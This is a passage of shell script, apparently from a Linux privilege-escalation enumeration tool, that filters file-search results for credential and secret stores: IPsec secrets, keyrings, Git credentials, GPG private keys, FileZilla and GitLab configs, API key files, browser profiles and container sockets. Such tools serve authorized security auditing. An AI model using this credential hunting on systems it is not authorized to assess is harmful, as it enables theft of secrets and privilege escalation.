    861   PSTORAGE_IPSEC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70)
    862   PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.irssi$" | sort | uniq | head -n 70)
    863   PSTORAGE_KEYRING=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70)
    864   PSTORAGE_VIRTUAL_DISKS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.vhd$|.*\.vhdx$|.*\.vmdk$" | sort | uniq | head -n 70)
    865   PSTORAGE_FILEZILLA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70)
    866   PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70)
    867   PSTORAGE_SPLUNK=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "passwd$" | sort | uniq | head -n 70)
    868   PSTORAGE_GIT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.git-credentials$" | sort | uniq | head -n 70)
    869   PSTORAGE_ATLANTIS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "atlantis\.db$" | sort | uniq | head -n 70)
    870   PSTORAGE_GITLAB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E '/lib' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70)
    871   PSTORAGE_PGP_GPG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E 'README.gnupg|/usr/share/|/usr/lib/|/lib/|/man/' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pgp$|.*\.gpg$|.*\.asc$|secring\.gpg$|pubring\.kbx$|trustdb\.gpg$|gpg-agent\.conf$|secret\.asc$|private-keys-v1\.d/.*\.key$|.*\.gnupg$" | sort | uniq | head -n 70)
    872   PSTORAGE_CACHE_VI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70)
    873   PSTORAGE_DOCKER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$|dockershim\.sock$|containerd\.sock$|crio\.sock$|frakti\.sock$|rktlet\.sock$|\.docker$" | sort | uniq | head -n 70)
    874   PSTORAGE_FIREFOX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70)
    875   PSTORAGE_CHROME=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70)
    876   PSTORAGE_OPERA=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70)
    877   PSTORAGE_SAFARI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70)
    878   PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70)
    879   PSTORAGE_FASTCGI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "fastcgi_params$" | sort | uniq | head -n 70)
    880   PSTORAGE_FAT_FREE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "fat\.config$" | sort | uniq | head -n 70)
    881   PSTORAGE_SHODAN=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "api_key$" | sort | uniq | head -n 70)
    882   PSTORAGE_CONCOURSE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.flyrc$|concourse-auth$|concourse-keys$" | sort | uniq | head -n 70)
